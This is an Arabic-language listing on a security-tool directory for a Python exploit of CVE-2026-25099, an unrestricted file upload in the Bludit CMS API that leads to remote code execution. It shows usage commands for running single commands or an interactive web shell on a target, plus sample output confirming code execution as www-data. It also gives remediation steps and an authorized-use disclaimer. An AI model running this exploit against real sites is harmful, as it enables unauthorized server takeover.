Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-25099 — استغلال بلغة بايثون لرفع ملفات غير مقيد في واجهة برمجة تطبيقات نظام إدارة المحتوى Bludit CMS مما يؤدي إلى تنفيذ كود عن بُعد، مع توفير تنفيذ الأوامر وقشرة تفاعلية للاختبار المصرح به. | Kitploit
أدوات/GitHubGitHub/yahiahamza/cve-2026-25099
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرتطوير الحمولات
GitHubyahiahamza/cve-2026-25099

CVE-2026-25099

استغلال بلغة بايثون لرفع ملفات غير مقيد في واجهة برمجة تطبيقات نظام إدارة المحتوى Bludit CMS مما يؤدي إلى تنفيذ كود عن بُعد، مع توفير تنفيذ الأوامر وقشرة تفاعلية للاختبار المصرح به.

عرض المستودع
منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-25099 - Bludit CMS API رفع ملفات غير مقيد يؤدي إلى تنفيذ أوامر عن بُعد (RCE)

الوصف

إصدارات Bludit CMS قبل 3.18.4 تسمح لمهاجم مُصادق يمتلك رمز API صالحًا برفع ملفات من أي نوع وامتداد عبر نقطة النهاية POST /api/files/<page-key>. لا تقوم دالة uploadFile() بأي تحقق من امتداد الملف أو محتواه، مما يسمح برفع قشرة ويب PHP وتنفيذها بصلاحيات www-data.

الإصدارات المتأثرة

  • قابلة للاستغلال: Bludit < 3.18.4
  • تم الإصلاح: Bludit 3.18.4
  • المتطلب الأساسي: رمز API صالح (ظاهر في لوحة التحكم تحت الإضافات ← API)

الاستخدام

root@kitploit:~
# تنفيذ أمر واحد
python3 CVE-2026-25099.py -u http://target -t "API_TOKEN" -c "id"

# قشرة تفاعلية
python3 CVE-2026-25099.py -u http://target -t "API_TOKEN"

مثال على المخرجات

root@kitploit:~
[*] CVE-2026-25099 - Bludit CMS API رفع ملفات إلى RCE
[*] الهدف: http://target
[*] جاري استرجاع مفتاح الصفحة...
[+] مفتاح الصفحة: create-your-own-content
[*] جاري رفع القشرة...
[+] تم رفع القشرة: http://target/bl-content/uploads/pages/create-your-own-content/abcdefgh.php
[*] جاري التحقق من RCE...
[+] تم تأكيد RCE: uid=33(www-data) gid=33(www-data) groups=33(www-data)

[+] قشرة تفاعلية (اكتب 'exit' للخروج)

shell> whoami
www-data
shell> grep BLUDIT_VERSION /var/www/html/bl-kernel/boot/init.php
define('BLUDIT_VERSION', '3.18.2');

لقطات الشاشة

تنفيذ PoC

الإصلاح

  • التحديث إلى Bludit 3.18.4 أو أحدث
  • تعطيل إضافة API إذا لم تكن مطلوبة
  • مراقبة /bl-content/uploads/ بحثًا عن ملفات PHP غير متوقعة

المراجع

  • CVE-2026-25099 على MITRE
  • التحليل الفني - yh.do

المؤلف

يحيى حمزة - https://yh.do

إخلاء المسؤولية

تُقدَّم هذه الأداة لأغراض اختبار الأمان المصرح به والأغراض التعليمية فقط. استخدمها بمسؤولية وفقط ضد الأنظمة التي لديك إذن باختبارها.

تنزيل الأداة